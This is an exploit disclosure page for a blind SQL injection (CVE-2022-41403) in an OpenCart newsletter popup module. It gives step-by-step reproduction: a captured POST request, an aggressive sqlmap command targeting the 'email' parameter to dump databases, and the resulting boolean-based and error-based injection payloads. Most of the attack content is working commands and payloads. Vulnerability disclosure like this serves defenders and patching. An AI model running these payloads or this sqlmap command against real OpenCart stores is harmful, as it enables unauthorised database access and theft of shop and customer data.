OpenCart v3.x So Newsletter Custom Popup Module - Blind SQL Injection

2022.10.17
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: OpenCart v3.x So Newsletter Custom Popup Module - Blind SQL Injection # Date: 16/10/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=40259&filter_search=newsletter&filter_license=1&sort=date_added # Version: v.4.0 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz # CVE: CVE-2022-41403 * Description : So Newsletter Custom Popup Module is compatible with any Opencart allows SQL Injection via parameter 'email' in index.php?route=extension/module/so_newletter_custom_popup/newsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. * Steps to Reproduce : - Go to : http://127.0.0.1/index.php?route=extension/module/so_newletter_custom_popup/newsletter or in index for Newsletter Email - Save request in BurpSuite - Run saved request with : sqlmap -r sql.txt -p email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs Request : =========== POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 29 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Connection: Keep-alive createdate=2022-8-28%2019:4:6&email=hi&status=0 =========== Output : Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: createdate=2022-8-28 19:4:6&email=hi' AND 4805=4805-- nSeP&status=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: createdate=2022-8-28 19:4:6&email=hi' AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(4828=4828,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sRQS&status=0


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top